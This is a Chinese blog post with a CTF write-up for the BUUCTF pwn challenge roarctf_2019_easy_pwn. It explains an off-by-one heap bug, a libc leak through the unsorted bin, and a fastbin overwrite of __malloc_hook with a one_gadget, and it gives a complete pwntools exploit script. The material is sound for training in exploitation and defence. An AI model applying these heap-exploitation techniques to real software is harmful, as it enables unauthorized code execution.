[BUUCTF]刷题记录-----roarctf_2019_easy_pwn

最新推荐文章于 2024-02-03 02:09:42 发布
最新推荐文章于 2024-02-03 02:09:42 发布
阅读量223 收藏
点赞数
分类专栏: PWN 网络安全 文章标签: 安全 网络 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/KaliLinux_V/article/details/128831800
版权

查看程序保护机制

题目分析

add函数

在这里插入图片描述

创建chunk,最多创建15个,不能大于4096字节,函数没有问题

edit函数

在这里插入图片描述
在这里插入图片描述
edit函数中有个问题,就是编辑时输入的size减去添加时的size时的值为10时,可以多输入一个字节,纯在off-by-one漏洞。

free函数

在这里插入图片描述
没有问题,free之后都置空了。

show函数

在这里插入图片描述
这里会打印出chunk的内容,输出的长度为之前创建chunk时的size大小。

思路

利用off-by-one漏洞泄露出libc的地址,然后改__free_hook为one-gadget

解题

先把前面的内容写好

from pwn import *
from LibcSearcher import *

context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./roarctf_2019_easy_pwn"
#io = remote("node4.buuoj.cn",28851)
io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc-2.23_64.so")

def add(size):
	io.recvuntil(b"choice: ")
	io.sendline(b"1")
	io.recvuntil(b"size: ")
	io.sendline(str(size))

def edit(idx,size,data):
	io.recvuntil(b"choice: ")
	io.sendline(b"2")
	io.recvuntil(b"index: ")
	io.sendline(str(idx))
	io.recvuntil(b"size: ")
	io.sendline(str(size))
	io.recvuntil(b"content: ")
	io.send(data)

def free(idx):
	io.recvuntil(b"choice: ")
	io.sendline(b"3")
	io.recvuntil(b"index: ")
	io.sendline(str(idx))

def show(idx):
	io.recvuntil(b"choice: ")
	io.sendline(b"4")
	io.recvuntil(b"index: ")
	io.sendline(str(idx))

先创建4个chunk

add(0x18) #0	
add(0x10) #1
add(0x90) #2
add(0x18) #3

在这里插入图片描述
然后通过off-by-one漏洞编辑chunk0,更改chunk1的size位。

payload = b"a"*0x10 + p64 (0x20) + p8(0xa1)
edit(0,0x18+10,payload)
payload = p64(0)*0xe + p64(0xa0) + p64(0x21)
edit(2,0x80,payload)

在这里插入图片描述
这样就伪造了两个chunk的大小,但在程序中储存的chunk1的size值不是0x90而是0x10,chunk2不是0x10而是0x90,即使chunk1现在是0xa1的大小,但只能编辑0x10的字节。

free(1)
add(0x90)

payload = p64(0)*3 + p64(0xa1)
edit(1,0x20,payload)

free(2)
show(1)

现在free chunk1它就会加入unsorted bin,然后再创建一个0x90大小的chunk,这是就会把chunk1给我们,然后再还原原来的chunk2。free掉chunk2再show就能泄露出main_arena+88的地址。
在这里插入图片描述
然后计算我们要用到的函数地址。

io.recvuntil(b"\x7f\x00\x00")
libc_addr = u64(io.recv(6).ljust(8,b"\x00"))-88-libc.sym['__malloc_hook']-0x10
malloc_hook = libc_addr+libc.sym["__malloc_hook"]
realloc_hook = libc_addr+libc.sym["realloc"]
gadget = [0x45216,0x4526a,0xf02a4,0xf1147]
one_gadget = libc_addr+gadget[3]
ptr_chunk = malloc_hook-0x23
print("libc_addr--------------->:",hex(libc_addr))
print("malloc_hook--------------->:",hex(malloc_hook))
print("realloc_hook------------>: ",hex(realloc_hook))
print("ptr_chunk---------------->: ",hex(ptr_chunk))

重新申请chunk2,构造chunk2,然后释放。修改chunk2的链表地址为

malloc_hook,把堆块申请到malloc_hook
add(0x80) #2
payload = p64(0)*3+p64(0x71)+p64(0)*12 + p64(0x70) + p64(0x21)
edit(1,0x90,payload)
free(2)
payload = p64(0)*3 + p64(0x71) + p64(ptr_chunk)*2
edit(1,0x30,payload)
add(0x60)
add(0x60) #4

申请到堆块后,修改malloc_hook的内容为 one_gadget。最后,申请堆块执行one_gadget

payload = b"a"*11 + p64(one_gadget) + p64(realloc_hook+4)
edit(4,27,payload)

add(0x60)

完整exp为:

from pwn import *
from LibcSearcher import *

context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./roarctf_2019_easy_pwn"
io = remote("node4.buuoj.cn",28461)
#io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc-2.23_64.so")

def add(size):
	io.recvuntil(b"choice: ")
	io.sendline(b"1")
	io.recvuntil(b"size: ")
	io.sendline(str(size))

def edit(idx,size,data):
	io.recvuntil(b"choice: ")
	io.sendline(b"2")
	io.recvuntil(b"index: ")
	io.sendline(str(idx))
	io.recvuntil(b"size: ")
	io.sendline(str(size))
	io.recvuntil(b"content: ")
	io.send(data)

def free(idx):
	io.recvuntil(b"choice: ")
	io.sendline(b"3")
	io.recvuntil(b"index: ")
	io.sendline(str(idx))

def show(idx):
	io.recvuntil(b"choice: ")
	io.sendline(b"4")
	io.recvuntil(b"index: ")
	io.sendline(str(idx))

add(0x18) #0	
add(0x10) #1
add(0x90) #2
add(0x18) #3
payload = b"a"*0x10 + p64 (0x20) + p8(0xa1)
edit(0,0x18+10,payload)

payload = p64(0)*0xe + p64(0xa0) + p64(0x21)
edit(2,0x80,payload)
free(1)
add(0x90)

payload = p64(0)*3 + p64(0xa1)
edit(1,0x20,payload)

free(2)
show(1)

io.recvuntil(b"\x7f\x00\x00")
libc_addr = u64(io.recv(6).ljust(8,b"\x00"))-88-libc.sym['__malloc_hook']-0x10
malloc_hook = libc_addr+libc.sym["__malloc_hook"]
realloc_hook = libc_addr+libc.sym["realloc"]
gadget = [0x45216,0x4526a,0xf02a4,0xf1147]
one_gadget = libc_addr+gadget[3]
ptr_chunk = malloc_hook-0x23
print("libc_addr--------------->:",hex(libc_addr))
print("malloc_hook--------------->:",hex(malloc_hook))
print("realloc_hook------------>: ",hex(realloc_hook))
print("ptr_chunk---------------->: ",hex(ptr_chunk))

add(0x80) #2
payload = p64(0)*3+p64(0x71)+p64(0)*12 + p64(0x70) + p64(0x21)
edit(1,0x90,payload)
free(2)
payload = p64(0)*3 + p64(0x71) + p64(ptr_chunk)*2
edit(1,0x30,payload)
add(0x60)
add(0x60) #4

payload = b"a"*11 + p64(one_gadget) + p64(realloc_hook+4)
edit(4,27,payload)

add(0x60)

# gdb.attach(io)




io.interactive()
saulgoodman-q
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
“百度杯”CTF比赛 十二月场easypwn
红凳子的博客
04-04 532
“百度杯”CTF比赛 十二月场easypwn前言一、程序分析二、漏洞利用exploit 前言 在这篇文章中将学习到泄露canary、ret2scu和ret2syscall 一、程序分析 从中可以看出该程序为64位动态链接的ELF文件,开启了canary保护,需要想办法绕过。 绕过canary的方法分为两种,一种为直接泄露canary的值,另一种为覆盖canary的值。 这里选择泄露canary的值,可以看出canary的位置在[rbp-8h]处,接着想办法泄露出[rbp-8h]处数据。 从源码中可以
Roar CTF 2019 坦克大战 Writeup
Secz的博客
10-15 2007
下载压缩包 解压看到 可知该游戏由Unity3D编写,由于没有相关逆向经验,上网查阅得知游戏代码部分都在Assembly-CSharp.dll文件中,通过dnspy可以打开此类型的dll. 直接查看跟题目相关的函数,在MapManager下有名为WinGame的函数.源码如下 // MapManager // Token: 0x06000029 RID: 41 RVA: 0x00003050 ...
【靶场练习】BUUCTF——[RoarCTF 2019]Easy Java
weixin_49422491的博客
07-31 1886
[RoarCTF 2019]Easy Java
buuctf_roarctf_2019_easyheap离谱的一题
qq_43766802的博客
09-29 618
首先例行公事,用checksec检查一下函数的保护措施,发现除了pie保护全开,但此题不需要泄漏程序加载地址,是个好事 查看一下函数逻辑,程序一开始我们可以向内存区域的某一块输入数据,接下来就是heap的经典菜单栏,add函数允许我们创建任意大小的buf,但只有一个指针,free时没有删除指针,可以double free,当我们输入666时程序允许我们添加和free一个大小固定的chunk给ptr,这个ptr其实没什么用,主要用来给自定义大小的buf double free做道具用,show函数只有当
攻防世界easypwn
weixin_44447516的博客
08-01 495
攻防世界 EasyPwn
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
[BUUCTF]-PWN:roarctf_2019_easy_pwn解析
最新发布
2301_79326813的博客
02-03 1398
先看保护64位,got表不可写看ida大致就是alloc创建堆块,fill填充堆块,free释放堆块,show输出堆块内容这里要注意的点有以下alloc创建堆块:这里采用的是calloc而不是malloc,calloc在创建堆块时会初始化也就是清空相应的内存空间,而malloc不会,这里使用calloc创建堆块fill填充堆块:这里它限制了填充的字节大小不得超过堆块大小,但如果填充大小正好大于堆块10字节的话,就可以多溢出一个字节,存在off by one漏洞。
[BUUCTF]PWN——roarctf_2019_easy_pwn
qq_51687381的博客
07-29 257
白天睡觉,晚上来写道题。 这道题涉及了unsortedbins,malloc_hook,堆溢出。 heap的菜单选项常规题,做到目前为止,主要是两个思路: 先check,根据RELRO。如果为full,那么就需要malloc_hook。如果为partial,就直接更改got表就可以了。 在create函数中可以明显看出来这是个结构体 一个结构体有24个字节,前8个为标志位,中间8个size位,后8个是alloc出来的chunk的指针。 (alloc和malloc不同的是 alloc的fr
PWN刷题Pwnable-calc、Buu-roarctf_2019_easyrop
QYbudong的博客
05-06 1490
今天事略多,做一道pwnable+一道有分的buu吧一、Buu-roarctf_2019_easyrop。
BUUCTFroarctf_2019_easy_pwn】(off by one)
weixin_51055545的博客
02-03 1111
BUUCTFroarctf_2019_easy_pwn】 检查程序: 保护机制全开 分析: add(),show(),free()函数都正常,漏洞点在edit()中 a2-a1=10时,我们可以多写入一个字节,存在by one溢出 思路: 1.堆风水泄露libc地址 2.堆块重叠劫持malloc_hook为one_gadget 3.申请触发one_gadget exp: leak地址: add(0x90) add(0x18) add(0x90) add(0x90) free(0) edit(1,0
buuoj刷题记录 - roarctf_2019_easy_pwn
qq_34010404的博客
03-17 192
检查一下保护: 拖进IDA分析程序: 问题处在write函数中, 最后可以溢出一个字节. 思路:溢出一个字节覆盖下一个chunk的prev in use标记位.然后向前合并,构造重叠chunk。 下面是我的构造方法: create三个这样的chunk free掉0 ,然后利用chunk1 覆盖掉chunk2的prev in use 标记位.同时在chunk1内布置好prev size.(glibc-2.23不会通过prev size 找到chunk ,然后比较前一个chunk的size,所以
BUUCTF WEB 个人做题记录(6-4)
qq_61620566的博客
06-04 267
BUUCTF web部分做题记录,当作学习笔记吧
BUUCTF__[RoarCTF 2019]Easy Calc_题解
风过江南乱的博客
05-11 950
一、看题 拿到题目 输入发现会显示简单的计算。 想到是不是ssti模板注入。 尝试{{1+1}}报错,行不通。 F12查看源码。发现存在WAF,访问 calc.php 。 尝试访问得到源代码。 <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' ', '\t', '\r'
BUUCTF-[RoarCTF2019]polyre
weixin_61154173的博客
03-09 539
控制流平坦化,然后代码流程:第一个for循环没用,从第二个看外循环6次,内循环64次,把flag看为8个字节一组,然后如果是非负数就乘2(相当左移),如果是负数就乘2(相当左移)在异或一个数。简单来说,OLLVM会添加一个用于控制跳转的状态变量和分发器:当一个真实块执行完成后,会把状态变量的值进行更新,回到分发器进行检查,再根据状态变量的值跳转到下一个真实块执行;提取码u2g0,下载完后注意:deflat.py文件中的sys.path.append()后的地址是你下载的am_graph.py的地址,
BUUCTF·[RoarCTF2019]babyRSA·WP
sm1918451478的博客
11-10 229
BUUCTF·[RoarCTF2019]babyRSA·WP
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装pwntools:使用命令`python3 -m pip install --upgrade pwntools`来安装并更新pwntools。 2. 安装mosquitto程序和mosquitto-clients客户端程序:使用命令`sudo apt install mosquitto`和`sudo apt install mosquitto-clients`来安装mosquitto程序和mosquitto-clients客户端程序。 请注意,以上步骤假设您已经在Linux环境下进行操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值